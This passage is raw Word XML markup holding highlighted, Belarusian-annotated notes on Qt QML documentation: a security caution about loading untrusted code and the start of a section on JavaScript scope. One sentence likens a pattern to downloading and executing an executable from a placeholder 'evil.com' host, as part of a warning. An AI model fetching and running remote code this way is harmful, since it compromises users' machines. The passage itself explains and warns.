        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00F3106D" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is equivalent to downloading and executing "http://evil.com/evil.exe".</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The QML engine will not prevent particular resources from being loaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Unlike JavaScript code that is run within a web browser, a QML application can load remote or local filesystem resources in the same way as any other native applications, so application developers must be careful in loading and executing any content.</w:t>
      </w:r>
      <w:r w:rsidR="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Вельмі важная дзірка ў бяспецы </w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qml</w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As with any application accessing other content beyond its control, a QML application should </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>perform appropriate checks on any untrusted data it loads.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Do not, for example, use</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId399" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:hyperlink r:id="rId400" w:anchor="xmlhttprequest" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XMLHttpRequest</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to load any untrusted code or content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F74BB" w:rsidRPr="00F3106D" w:rsidRDefault="00490E7E" w:rsidP="00F3106D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId401" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-documents-scope.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="008D55B3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="512" w:name="_Toc483000640"/>
      <w:bookmarkStart w:id="513" w:name="_Toc483003657"/>
      <w:bookmarkStart w:id="514" w:name="_Toc483603993"/>
      <w:bookmarkStart w:id="515" w:name="_Toc483605213"/>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope and Naming Resolution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="512"/>
      <w:bookmarkEnd w:id="513"/>
      <w:bookmarkEnd w:id="514"/>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="008D55B3" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inline functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imported JavaScript files</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run in a JavaScript scop</w:t>
      </w:r>
      <w:r w:rsidRPr="008175CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008175CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which variables an expression can access</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>variable takes precedence when two or more names conflict</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>// дзве асноўныя задачы прасторы імёнаў //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As JavaScript's built-in scope mechanism is very simple, QML enhances it to fit more naturally with the QML language extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="008D55B3" w:rsidRDefault="00F3106D" w:rsidP="008D55B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="516" w:name="javascript-scope"/>
      <w:bookmarkStart w:id="517" w:name="_Toc483000641"/>
      <w:bookmarkStart w:id="518" w:name="_Toc483003658"/>
      <w:bookmarkStart w:id="519" w:name="_Toc483603994"/>
      <w:bookmarkStart w:id="520" w:name="_Toc483605214"/>
      <w:bookmarkEnd w:id="516"/>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="517"/>
      <w:bookmarkEnd w:id="518"/>
      <w:bookmarkEnd w:id="519"/>
      <w:bookmarkEnd w:id="520"/>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524E68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML's scope extensions do not interfere with JavaScript's natural scoping</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. JavaScript programmers can reuse their existing knowledge when programming functions, property bindings or imported JavaScript files in QML.</w:t>
      </w:r>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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the following example,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addConstant()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method will add 13 to the parameter passed just as the programmer would expect irrespective of the value of the QML object's</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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties.</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QtObject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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</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3</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</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9</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> addConstant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b</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a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13</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> b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a</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>That QML respects JavaScript's normal scoping rules even applies in bindings. This totally evil, abomination of a binding will assign 12 to the QML object's</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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
